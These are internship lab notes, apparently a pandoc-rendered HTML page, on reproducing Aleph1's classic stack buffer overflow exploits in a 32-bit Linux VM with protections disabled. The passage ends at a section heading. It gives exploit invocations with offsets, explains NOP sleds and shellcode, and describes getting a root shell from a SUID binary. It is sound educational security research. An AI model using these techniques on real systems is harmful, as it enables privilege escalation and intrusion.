NOTES.html

<!DOCTYPE html>
<!--
==============================================================================
           "GitHub HTML5 Pandoc Template" v2.1 — by Tristano Ajmone           
==============================================================================
Copyright © Tristano Ajmone, 2017, MIT License (MIT). Project's home:

- https://github.com/tajmone/pandoc-goodies

The CSS in this template reuses source code taken from the following projects:

- GitHub Markdown CSS: Copyright © Sindre Sorhus, MIT License (MIT):
  https://github.com/sindresorhus/github-markdown-css

- Primer CSS: Copyright © 2016-2017 GitHub Inc., MIT License (MIT):
  http://primercss.io/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The MIT License 

Copyright (c) Tristano Ajmone, 2017 (github.com/tajmone/pandoc-goodies)
Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
Copyright (c) 2017 GitHub Inc.

"GitHub Pandoc HTML5 Template" is Copyright (c) Tristano Ajmone, 2017, released
under the MIT License (MIT); it contains readaptations of substantial portions
of the following third party softwares:

(1) "GitHub Markdown CSS", Copyright (c) Sindre Sorhus, MIT License (MIT).
(2) "Primer CSS", Copyright (c) 2016 GitHub Inc., MIT License (MIT).

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================-->
<html>
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="pandoc" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
  <meta name="author" content="Florian Hofhammer" />
  <meta name="dcterms.date" content="2020-05-14" />
  <title>Notes for the Stack Buffer Overflow internship at INRIA Sophia</title>
  <style type="text/css">
@charset "UTF-8";.markdown-body{text-align:justify;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;color:#24292e;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:16px;line-height:1.5;word-wrap:break-word;box-sizing:border-box;min-width:200px;max-width:980px;margin:0 auto;padding:45px}.markdown-body a{color:#0366d6;background-color:transparent;text-decoration:none;-webkit-text-decoration-skip:objects}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body a:hover{text-decoration:underline}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body strong{font-weight:600}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4,.markdown-body h5,.markdown-body h6{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h1{font-size:2em;margin:.67em 0;padding-bottom:.3em;border-bottom:1px solid #eaecef}.markdown-body h2{padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid #eaecef}.markdown-body h3{font-size:1.25em}.markdown-body h4{font-size:1em}.markdown-body h5{font-size:.875em}.markdown-body h6{font-size:.85em;color:#6a737d}.markdown-body img{border-style:none}.markdown-body svg:not(:root){overflow:hidden}.markdown-body hr{box-sizing:content-box;height:.25em;margin:24px 0;padding:0;overflow:hidden;background-color:#e1e4e8;border:0}.markdown-body hr::before{display:table;content:""}.markdown-body hr::after{display:table;clear:both;content:""}.markdown-body input{margin:0;overflow:visible;font:inherit;font-family:inherit;font-size:inherit;line-height:inherit}.markdown-body [type=checkbox]{box-sizing:border-box;padding:0}.markdown-body *{box-sizing:border-box}.markdown-body blockquote{margin:0}.markdown-body ol,.markdown-body ul{padding-left:2em}.markdown-body ol ol,.markdown-body ul ol{list-style-type:lower-roman}.markdown-body ol ol,.markdown-body ol ul,.markdown-body ul ol,.markdown-body ul ul{margin-top:0;margin-bottom:0}.markdown-body ol ol ol,.markdown-body ol ul ol,.markdown-body ul ol ol,.markdown-body ul ul ol{list-style-type:lower-alpha}.markdown-body li>p{margin-top:16px}.markdown-body li+li{margin-top:.25em}.markdown-body dd{margin-left:0}.markdown-body dl{padding:0}.markdown-body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:600}.markdown-body dl dd{padding:0 16px;margin-bottom:16px}.markdown-body code{font-family:SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body pre{font:12px SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace;word-wrap:normal}.markdown-body blockquote,.markdown-body dl,.markdown-body ol,.markdown-body p,.markdown-body pre,.markdown-body table,.markdown-body ul{margin-top:0;margin-bottom:16px}.markdown-body blockquote{padding:0 1em;color:#6a737d;border-left:.25em solid #dfe2e5}.markdown-body blockquote>:first-child{margin-top:0}.markdown-body blockquote>:last-child{margin-bottom:0}.markdown-body table{display:block;width:100%;overflow:auto;border-spacing:0;border-collapse:collapse}.markdown-body table th{font-weight:600}.markdown-body table td,.markdown-body table th{padding:6px 13px;border:1px solid #dfe2e5}.markdown-body table tr{background-color:#fff;border-top:1px solid #c6cbd1}.markdown-body table tr:nth-child(2n){background-color:#f6f8fa}.markdown-body img{max-width:100%;box-sizing:content-box;background-color:#fff}.markdown-body code{padding:.2em 0;margin:0;font-size:85%;background-color:rgba(27,31,35,.05);border-radius:3px}.markdown-body code::after,.markdown-body code::before{letter-spacing:-.2em;content:" "}.markdown-body pre>code{padding:0;margin:0;font-size:100%;word-break:normal;white-space:pre;background:0 0;border:0}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body .highlight pre,.markdown-body pre{padding:16px;overflow:auto;font-size:85%;line-height:1.45;background-color:#f6f8fa;border-radius:3px}.markdown-body pre code{display:inline;max-width:auto;padding:0;margin:0;overflow:visible;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}.markdown-body pre code::after,.markdown-body pre code::before{content:normal}.markdown-body .full-commit .btn-outline:not(:disabled):hover{color:#005cc5;border-color:#005cc5}.markdown-body kbd{box-shadow:inset 0 -1px 0 #959da5;display:inline-block;padding:3px 5px;font:11px/10px SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace;color:#444d56;vertical-align:middle;background-color:#fcfcfc;border:1px solid #c6cbd1;border-bottom-color:#959da5;border-radius:3px;box-shadow:inset 0 -1px 0 #959da5}.markdown-body :checked+.radio-label{position:relative;z-index:1;border-color:#0366d6}.markdown-body .task-list-item{list-style-type:none}.markdown-body .task-list-item+.task-list-item{margin-top:3px}.markdown-body .task-list-item input{margin:0 .2em .25em -1.6em;vertical-align:middle}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>:first-child{margin-top:0!important}.markdown-body>:last-child{margin-bottom:0!important}.Alert,.Error,.Note,.Success,.Warning{padding:11px;margin-bottom:24px;border-style:solid;border-width:1px;border-radius:4px}.Alert p,.Error p,.Note p,.Success p,.Warning p{margin-top:0}.Alert p:last-child,.Error p:last-child,.Note p:last-child,.Success p:last-child,.Warning p:last-child{margin-bottom:0}.Alert{color:#246;background-color:#e2eef9;border-color:#bac6d3}.Warning{color:#4c4a42;background-color:#fff9ea;border-color:#dfd8c2}.Error{color:#911;background-color:#fcdede;border-color:#d2b2b2}.Success{color:#22662c;background-color:#e2f9e5;border-color:#bad3be}.Note{color:#2f363d;background-color:#f6f8fa;border-color:#d5d8da}.Alert h1,.Alert h2,.Alert h3,.Alert h4,.Alert h5,.Alert h6{color:#246;margin-bottom:0}.Warning h1,.Warning h2,.Warning h3,.Warning h4,.Warning h5,.Warning h6{color:#4c4a42;margin-bottom:0}.Error h1,.Error h2,.Error h3,.Error h4,.Error h5,.Error h6{color:#911;margin-bottom:0}.Success h1,.Success h2,.Success h3,.Success h4,.Success h5,.Success h6{color:#22662c;margin-bottom:0}.Note h1,.Note h2,.Note h3,.Note h4,.Note h5,.Note h6{color:#2f363d;margin-bottom:0}.Alert h1:first-child,.Alert h2:first-child,.Alert h3:first-child,.Alert h4:first-child,.Alert h5:first-child,.Alert h6:first-child,.Error h1:first-child,.Error h2:first-child,.Error h3:first-child,.Error h4:first-child,.Error h5:first-child,.Error h6:first-child,.Note h1:first-child,.Note h2:first-child,.Note h3:first-child,.Note h4:first-child,.Note h5:first-child,.Note h6:first-child,.Success h1:first-child,.Success h2:first-child,.Success h3:first-child,.Success h4:first-child,.Success h5:first-child,.Success h6:first-child,.Warning h1:first-child,.Warning h2:first-child,.Warning h3:first-child,.Warning h4:first-child,.Warning h5:first-child,.Warning h6:first-child{margin-top:0}h1.title,p.subtitle{text-align:center}h1.title.followed-by-subtitle{margin-bottom:0}p.subtitle{font-size:1.5em;font-weight:600;line-height:1.25;margin-top:0;margin-bottom:16px;padding-bottom:.3em}div.line-block{white-space:pre-line}
  </style>
  <style type="text/css">code{white-space: break-spaces; word-break: keep-all;}</style>
  <style type="text/css">
a.sourceLine { display: inline-block; line-height: 1.25; }
a.sourceLine { pointer-events: none; color: inherit; text-decoration: inherit; }
a.sourceLine:empty { height: 1.2em; }
.sourceCode { overflow: visible; }
code.sourceCode { white-space: pre; position: relative; }
div.sourceCode { margin: 1em 0; }
pre.sourceCode { margin: 0; }
@media screen {
div.sourceCode { overflow: auto; }
}
@media print {
code.sourceCode { white-space: pre-wrap; }
a.sourceLine { text-indent: -1em; padding-left: 1em; }
}
pre.numberSource a.sourceLine
  { position: relative; left: -4em; }
pre.numberSource a.sourceLine::before
  { content: attr(data-line-number);
    position: relative; left: -1em; text-align: right; vertical-align: baseline;
    border: none; pointer-events: all; display: inline-block;
    -webkit-touch-callout: none; -webkit-user-select: none;
    -khtml-user-select: none; -moz-user-select: none;
    -ms-user-select: none; user-select: none;
    padding: 0 4px; width: 4em;
    color: #aaaaaa;
  }
pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa;  padding-left: 4px; }
div.sourceCode
  {  }
@media screen {
a.sourceLine::before { text-decoration: underline; }
}
code span.al { color: #ff0000; font-weight: bold; } /* Alert */
code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } /* Annotation */
code span.at { color: #7d9029; } /* Attribute */
code span.bn { color: #40a070; } /* BaseN */
code span.bu { } /* BuiltIn */
code span.cf { color: #007020; font-weight: bold; } /* ControlFlow */
code span.ch { color: #4070a0; } /* Char */
code span.cn { color: #880000; } /* Constant */
code span.co { color: #60a0b0; font-style: italic; } /* Comment */
code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } /* CommentVar */
code span.do { color: #ba2121; font-style: italic; } /* Documentation */
code span.dt { color: #902000; } /* DataType */
code span.dv { color: #40a070; } /* DecVal */
code span.er { color: #ff0000; font-weight: bold; } /* Error */
code span.ex { } /* Extension */
code span.fl { color: #40a070; } /* Float */
code span.fu { color: #06287e; } /* Function */
code span.im { } /* Import */
code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } /* Information */
code span.kw { color: #007020; font-weight: bold; } /* Keyword */
code span.op { color: #666666; } /* Operator */
code span.ot { color: #007020; } /* Other */
code span.pp { color: #bc7a00; } /* Preprocessor */
code span.sc { color: #4070a0; } /* SpecialChar */
code span.ss { color: #bb6688; } /* SpecialString */
code span.st { color: #4070a0; } /* String */
code span.va { color: #19177c; } /* Variable */
code span.vs { color: #4070a0; } /* VerbatimString */
code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } /* Warning */
  </style>
  <!--[if lt IE 9]>
    <script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv-printshiv.min.js"></script>
  <![endif]-->
</head>
<body>
<article class="markdown-body">
<header>
<h1 class="title">Notes for the Stack Buffer Overflow internship at INRIA Sophia</h1>
<p class="author">Florian Hofhammer</p>
<p class="date">2020-05-14</p>
</header>
<hr>
<nav id="TOC">
<h1 class="toc-title">Contents</h1>
<ul>
<li><a href="#virtual-machine-setup">Virtual Machine setup</a><ul>
<li><a href="#basic-information">Basic information</a></li>
<li><a href="#necessary-configuration">Necessary configuration</a></li>
<li><a href="#optional-configuration">Optional configuration</a></li>
</ul></li>
<li><a href="#smashing-the-stack-for-fun-and-profit---aleph1">Smashing the Stack for fun and profit - Aleph1</a><ul>
<li><a href="#example3.c">example3.c</a></li>
<li><a href="#overflow1.c">overflow1.c</a></li>
<li><a href="#vulnerable.c">vulnerable.c</a></li>
<li><a href="#optimizing-compilation">Optimizing compilation</a></li>
</ul></li>
<li><a href="#bit-linux-stack-smashing">64-bit Linux stack smashing</a><ul>
<li><a href="#part-1">Part 1</a></li>
<li><a href="#part-2">Part 2</a></li>
<li><a href="#part-3">Part 3</a></li>
<li><a href="#optimizing-compilation-1">Optimizing compilation</a></li>
</ul></li>
<li><a href="#aslr-smack-and-laugh">ASLR Smack and Laugh</a><ul>
<li><a href="#general-observations">General observations</a></li>
<li><a href="#aggression">Aggression</a></li>
<li><a href="#return-into-non-randomized-memory">Return into non-randomized memory</a></li>
<li><a href="#pointer-redirecting">Pointer redirecting</a></li>
<li><a href="#integer-overflows">Integer overflows</a></li>
<li><a href="#stack-divulging-methods">Stack divulging methods</a></li>
<li><a href="#stack-juggling-methods">Stack juggling methods</a></li>
<li><a href="#got-hijacking---ret2got">GOT hijacking - ret2got</a></li>
<li><a href="#off-by-one">Off by one</a></li>
<li><a href="#overwriting-.dtors">Overwriting .dtors</a></li>
<li><a href="#optimizing-compilation-2">Optimizing compilation</a></li>
</ul></li>
<li><a href="#stack-canary-bypassing">Stack canary bypassing</a><ul>
<li><a href="#stack-analysis---getcanary-and-getcanarythreaded">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></a></li>
<li><a href="#brute-force-leaking">Brute force leaking</a></li>
<li><a href="#extended-brute-force-leaking">Extended brute force leaking</a></li>
<li><a href="#optimizing-compilation-3">Optimizing compilation</a></li>
</ul></li>
</ul>
</nav>
<hr>
<h1 id="virtual-machine-setup">Virtual Machine setup</h1>
<h2 id="basic-information">Basic information</h2>
<p>The virtual machine used for the experiments is based on the Ubuntu 20.04 Desktop distribution with Linux kernel 5.4.0, GLIBC 2.31 and GCC 9.3.0 and runs in VirtualBox 6.1. Updates are regularly installed to keep the system up to date.<br />
ASLR is activated or deactivated on a case-to-case basis, as some of the exploits require ASLR to be turned off. However, as ASLR is enabled by default in modern Linux kernels, it has to be disabled manually if necessary. Turning ASLR off can be achieved by the command <code>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</code>, turning it back on by the command <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>.<br />
Support for compiling 32 bit executables was added by running</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb1-1" data-line-number="1">    <span class="fu">sudo</span> dpkg --add-architecture i386 <span class="co"># 32 bit packages</span></a>
<a class="sourceLine" id="cb1-2" data-line-number="2">    <span class="fu">sudo</span> apt-get update</a>
<a class="sourceLine" id="cb1-3" data-line-number="3">    <span class="fu">sudo</span> apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 \</a>
<a class="sourceLine" id="cb1-4" data-line-number="4">         g++-multilib build-essential gdb <span class="co"># install 32 bit libraries and development tools</span></a></code></pre></div>
<p>The machine the VM runs on is based on an Intel Core i5 6300HQ processor. This processor does <strong>not</strong> support Intel CET (Control-flow Enforcement Technology). This processor feature might lead to failures when running the described exploits on more modern Intel processors (i.e. Tiger Lake (11th Gen Intel Core) or higher according to a <a href="https://windows-internals.com/cet-on-windows/">windows-internals.com blog post</a>). In order to disable this feature in the executables, add the <code>-fcf-protection=none</code> compiler flag.<br />
As the compiler output differs depending on this flag being present or not, adaptations of addresses used for the exploits might be necessary.</p>
<p>The whole development process is conducted on the host machine of the VM where the VM could access the files via a shared directory. Compilation and execution of the compiled executables is conducted via a SSH shell. Thus, if developing and executing exploits directly in the VM, the shell’s environment may differ and adaptations might be necessary. However, this remote development approach is not a prerequisite for the steps described in the following sections. It is just a personal preference (see also section <a href="#optional-configuration">optional configuration</a>).</p>
<h2 id="necessary-configuration">Necessary configuration</h2>
<p>Some of the exploits (e.g. for the <a href="#64-bit-linux-stack-smashing">64 bit stack smashing tutorial</a> or the <a href="#stack-canary-bypassing">stack canary bypass</a>) were conducted using Python code based on the <code>pwntools</code> library. This library can be installed by invoking <code>pip3 install pwntools</code>. Dependencies should be installed automatically. If not so, those of course also have to be installed.</p>
<h2 id="optional-configuration">Optional configuration</h2>
<p>In order to ease debugging, I installed <code>peda</code>, <code>pwndbg</code> and <code>gef</code> using an install script from a <a href="https://github.com/apogiatzis/gdb-peda-pwndbg-gef">GitHub repository</a>. All of those three are extensions to the GDB debugger which improve the interface and provide additional commands which ease debugging greatly.<br />
As they are based on the GDB Python API and partly still use Python 2.7 (which by default is not included in current Ubuntu releases), it may be necessary to install the <code>python2-dev</code> package via <code>sudo apt install python2-dev</code>. If dependencies for the GDB extensions are missing, they also have to be installed via <code>pip</code>, e.g. <code>python2 -m pip install setuptools</code> to install the Python setup tools for Python 2.7.</p>
<p>Looking at Python, the package <code>python-is-python3</code> (installed via <code>sudo apt install python-is-python3</code>) makes <code>python</code> an alias for <code>python3</code>. This is just a convenient alias if the personal workflow includes just calling <code>python</code> instead of specifiying the Python version.</p>
<p>I also mounted the directory containing the internship data and files into the virtual machine and installed the OpenSSH Server (<code>sudo apt install openssh-server</code>) to be able to <code>ssh</code> into the virtual machine and execute all the code whilst not having to make any changes to the host machine. It is, however, important to point out that if accessing a shell via <code>ssh</code> in the VM, the stack addresses may differ from those when directly opening a terminal in the VM, as the <code>ssh</code> session adds additional information to the environment by setting environment variables which might lead to different offsets on the stack.</p>
<p>Additionally, I installed the disassembler and debugger <code>radare2</code> from <a href="https://github.com/radareorg/radare2">GitHub</a> for easy disassembly analysis. Installation was conducted by calling <code>git clone https://github.com/radareorg/radare2.git &amp;&amp; ./radare2/sys/install.sh</code>.</p>
<p>Other useful installed tools include <code>ropper</code> and <code>ROPgadget</code> which make it easier to find gadgets for return-oriented programming (ROP). Those were installed with <code>pip3 install ropper ropgadget</code>. For further information, see the GitHub repositories for <a href="https://github.com/sashs/Ropper">ropper</a> and <a href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a>.</p>
<p>All of those tools and installation steps are fully optional, the exploits work without those just fine. However, they can greatly reduce the time to find bugs and improve the exploit development process.</p>
<h1 id="smashing-the-stack-for-fun-and-profit---aleph1">Smashing the Stack for fun and profit - Aleph1</h1>
<p>As a starting exercise, I am trying to recreate the examples and exploits from the <a href="http://phrack.org/issues/49/14.html#article">original paper</a>. The compiler / linker flags for <code>gcc</code> generally used are <code>-m32 -fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0 -g -z execstack</code> (see e.g. the <a href="./Makefile.common">common Makefile</a> and the <a href="./Smashing%20the%20stack%20-%20Aleph1/Makefile">directory specific Makefile</a>). ASLR is turned off for this section. Without those measures, current stack overflow mitigation measures do not allow to successfully overflow the buffers on the stack as described in the paper.</p>
<h2 id="example3.c">example3.c</h2>
<p>The executable only yielded a segfault because the return address was incorrectly overwritten (checked with <code>gdb</code>). In order to correctly overwrite the return address, it is necessary to change the offset from <code>buffer1</code> from <code>12</code> to <code>13</code>, as the offset was off by one byte.</p>
<h2 id="overflow1.c">overflow1.c</h2>
<p>At the end of the <code>main</code> function, <code>gcc</code> produced the following assembly code:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb2-1" data-line-number="1"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb2-2" data-line-number="2"><span class="bu">lea</span>    <span class="bn">-0x8</span>(%<span class="kw">ebp</span>),%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb2-3" data-line-number="3"><span class="bu">pop</span>    %<span class="kw">ecx</span></a>
<a class="sourceLine" id="cb2-4" data-line-number="4"><span class="bu">pop</span>    %<span class="kw">ebx</span></a>
<a class="sourceLine" id="cb2-5" data-line-number="5"><span class="bu">pop</span>    %<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb2-6" data-line-number="6"><span class="bu">lea</span>    <span class="bn">-0x4</span>(%<span class="kw">ecx</span>),%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb2-7" data-line-number="7"><span class="bu">ret</span></a></code></pre></div>
<p>The problem here is that a value is popped from the stack into <code>ecx</code> and an offset from that value is used as the new <code>esp</code>. As we overwrite the stack with the buffer address, <code>esp</code> then points before the buffer instead of on the stack where the buffer address resides. Thus, the <code>ret</code> instruction fetches the wrong address and the exploit doesn’t work.</p>
<p>After having a lot of problems with this issue, I found a comment online suggesting to add the <code>-mpreferred-stack-boundary=2</code> compiler flag which instructs <code>gcc</code> to align on 4 bytes (2^2) (as it is the default on 32 bit architectures) instead of 16 bytes (as it is the default on 64 bit architectures). <strong>This additional flag is used throughout all of the following examples if compiled in 32 bit mode!</strong> With this change, the same part of the assembly code was generated as follows:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb3-1" data-line-number="1"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb3-2" data-line-number="2"><span class="bu">mov</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">ebx</span></a>
<a class="sourceLine" id="cb3-3" data-line-number="3"><span class="bu">leave</span></a>
<a class="sourceLine" id="cb3-4" data-line-number="4"><span class="bu">ret</span></a></code></pre></div>
<p><code>leave</code> destroys a stack frame and thus restores the stack pointer from <code>ebp</code>. Thus, <code>esp</code> has the good value after <code>leave</code> and the first value on the stack is the address of the buffer. Therefore, <code>ret</code> jumps to the buffer address and thus to our shellcode.</p>
<h2 id="vulnerable.c">vulnerable.c</h2>
<p>For this executable, the input to overflow the buffer correctly is provided by <code>exploit2</code>, <code>exploit3</code>, <code>exploit4</code> or <code>eggshell</code>. All of those executables can of course also be used for other vulnerable programs, not only for the example program given here.</p>
<h3 id="exploit2">exploit2</h3>
<p>This executable is compiled from <code>exploit2.c</code>. It takes two arguments: a buffer size and an offset. The buffer size tells the executable how many bytes should be filled with the shellcode and padded with the stack address and the offset manipulates the stack address to be written into the buffer.</p>
<p>This approach requires to exactly provide the correct buffer address in order to overwrite the return address with exactly the address of the start of the shellcode. This implies that being off by only a single byte probably causes the program to crash instead of spawning a shell.</p>
<p>With modern compilers (see <a href="#basic-information">Virtual machine basic information</a>), the stack offset is different than that given in Aleph1’s original paper: instead of calling <code>exploit2 600 1564</code> for a buffer size of 600 bytes filled with shellcode and stack address as well as an offset of 1564 bytes from the base stack address, it is necessary to call <code>exploit2 600 1660</code> which uses the same buffer size but a different offset.</p>
<p>The problem is that the offset 1660 might differ from machine to machine and from run to run, as it heavily depends on the stack contents. Thus, different environment variables (e.g. a different path, a different working directory, a different username) can heavily influence the necessary offsets, as they change the amount of data on the stack and thus the stack layout. It is therefore advised to determine the right address with the help of a debugger or continuing with the other exploits, as it is difficult to hit exactly the one single address that points to the shellcode.</p>
<h3 id="exploit3">exploit3</h3>
<p><code>exploit3</code> works exactly the same way as <code>exploit2</code> but instead of just writing the shellcode to the buffer, it fills half of the buffer with <code>NOP</code> instructions (<code>0x90</code> on x86) before writing the shellcode to the buffer.</p>
<p>This makes it easier to execute the shellcode, as it is not necessary to exactly hit the buffer address where the shellcode resides when overwriting the return address. It now is completely sufficient to overwrite the return address with an arbitrary address pointing into the first half of the buffer which gives us a certain degree of freedom and error resilience.</p>
<p>However, it is again not possible to just issue the call provided in the original paper (<code>exploit3 600</code>). When debugging the <code>vulnerable</code> executable, it is easy to see that the return address in fact points into the buffer but only at a part of the buffer where the stack address resides (i.e. to a part of the buffer after the NOP sled and the shellcode). Because of the NOP sled in front of the shellcode, it is then pretty easy to find an offset that reliably lets the program return onto the stack where our shellcode resides (e.g. <code>exploit3 600 350</code> or <code>exploit3 600 400</code>).</p>
<h3 id="exploit4">exploit4</h3>
<p><code>exploit4</code> works just like <code>exploit3</code> but instead of writing the NOP sled and the shellcode to the buffer, it writes them to an environment variable and only an address pointing to that variable into the buffer. This way, we’re not restricted by the buffer size concerning our NOP sled but we can make it as big as we want it to be.</p>
<p>In contrast to <code>exploit3</code>, <code>exploit4</code> can directly be called with e.g. <code>exploit4 600</code> for a buffer size of <code>600</code> bytes and no offset. Calling <code>vulnerable $RET</code> in the newly spawned shell, we achieve a buffer overflow and shellcode execution. Thus, putting a huge NOP sled into an environment variable certainly again increases the chance of hitting the shellcode when returning from the <code>main</code> function.</p>
<h3 id="eggshell">eggshell</h3>
<p>The <code>eggshell</code> executable basically does the same thing as <code>exploit4</code>. The difference is that it is suitable for different processor architectures and also has a more sophisticated command line interface. It also writes the overflow buffer to the environment variable <code>BOF</code> instead of <code>RET</code>.</p>
<p>However, the original version by Aleph1 contains an error: when creating the NOP sled, the stop condition is tested by <code>i &lt;= eggsize ...</code>. Therefore, the pointer into the egg buffer <code>ptr</code> is incremented once too often so that setting <code>egg[eggsize - 1] = '\0';</code> later in the code overwrites the last byte of the shellcode instead of just appending a zero byte to the NOP sled and shellcode. Thus, the shellcode tries to execute <code>/bin/s</code> instead of <code>/bin/sh</code>, which of course doesn’t yield the expected result.</p>
<p>Changing the comparison from <code>i &lt;= eggsize ...</code> to <code>i &lt; eggsize ...</code> fixes that problem, as one less NOP instruction is written to the egg buffer and thus the actual shellcode starts at a lower position in the buffer.</p>
<p>Providing no offset as with <code>exploit4</code>, the address in <code>BOF</code> does not point to the <code>EGG</code> environment variable. Just like with <code>exploit3</code>, it is easy to find a fitting offset with a debugger by looking at the difference of the provided (incorrect) address and the address of the <code>EGG</code> variable (e.g. by issuing <code>search &quot;EGG&quot;</code> in <code>gdb</code> with the <code>pwndbg</code> plugin). Thus, calling e.g. <code>eggshell -b 600 -o -2000</code> lets us spawn a shell from the <code>vulnerable</code> executable.</p>
<p>Additionally, appending the <code>-s</code> flag to the <code>eggshell</code> call uses a different shellcode which not only spawns a shell but also calls <code>setreuid(geteuid(), geteuid())</code> before. With this addition, it is not only possible to spawn a shell at all, but also to spawn a shell with the executable’s owner’s privileges if the SUID bit on the executable is set. If the owner is set to <code>root</code> and the SUID bit is set (e.g. by executing <code>sudo chown root vulnerable &amp;&amp; sudo chmod u+s vulnerable</code>), it is thus possible to spawn a root shell even when executing the exploit as a non-privileged user.</p>
<h2 id="optimizing-compilation">Optimizing compilation</h2>
<p>The results described in the previous sections were achieved without any compiler optimizations enabled. If compiling with the highest optimizations in GCC (i.e. the <code>-O3</code> flag), the results are a little bit different.</p>
<h3 id="example2.c">example2.c</h3>
<p>If we look for example at <a href="./Smashing%20the%20stack%20-%20Aleph1/example2.c">example2.c</a>, we can immediately spot the vulnerability: In the function <code>function</code>, we copy the string the function receives into a 16 bytes buffer, no matter how big the string is. Without optimizations, this leads to a segmentation fault, as the given string (i.e. 255 * ‘A’) is way to big for the buffer and overflows the return address. With optimizations enabled, the function is completely inlined, i.e. the space for <code>buffer</code> is already allocated on the stack in the main function and instead of calling <code>function</code>, <code>main</code> just calls <code>strcpy</code> itself with the correct parameters, i.e. the addresses of <code>buffer</code> and <code>large_string</code>.<br />
Because of how the stack is organized in this case, we don’t get a segmentation fault as we expected. This is because the <code>buffer</code> array resides on the stack directly after the <code>large_string</code> array (i.e. with a lower address) (see explanatory figures below). Thus, instead of overwriting the return address, there is coincidentally enough space on the stack to overwrite without harming the saved frame pointer or the return address and the <code>strcpy</code> call overwrites the start of <code>large_string</code> instead of control flow information on the stack. Technically, this is still considered a buffer overflow even though it makes no harm in this particular case.</p>
<p>Stack without optimization (each row corresponds to 4 bytes):</p>
<pre><code>higher address |                             |
               +-----------------------------+  ---+
               | return address (main)       |     |
               +-----------------------------+     |
               | saved frame ptr (main)      |     |
               +-----------------------------+     |
               | i                           |     +--- stack frame of main
               +-----------------------------+     |
               | large_string[255 - 252]     |     |
               | large_string[251 - 248]     |     |
               |           ...               |     |
               | large_string[3 - 0]         |     |
               +-----------------------------+  ---+
               | return address (function)   |  ---+
               +-----------------------------+     |
               | saved frame ptr (function)  |     |
               +-----------------------------+     |
               | buffer[15 - 12]             |     +--- stack frame of function
               | buffer[11 - 8]              |     |
               | buffer[7 - 4]               |     |
               | buffer[3 - 0]               |     |
               +-----------------------------+  ---+
lower address  |                             |</code></pre>
<p>Stack with optimization (each row corresponds to 4 bytes):</p>
<pre><code>higher address |                             |
               +-----------------------------+  ---+
               | return address (main)       |     |
               +-----------------------------+     |
               | saved frame ptr (main)      |     |
               +-----------------------------+     |
               | large_string[255 - 252]     |     |
               | large_string[251 - 248]     |     |
               |           ...               |     +--- stack frame of main
               | large_string[3 - 0]         |     |
               +-----------------------------+     |
               | buffer[15 - 12]             |     |
               | buffer[11 - 8]              |     |
               | buffer[7 - 4]               |     |
               | buffer[3 - 0]               |     |
               +-----------------------------+  ---+
lower address  |                             |</code></pre>
<h3 id="example3.c-1">example3.c</h3>
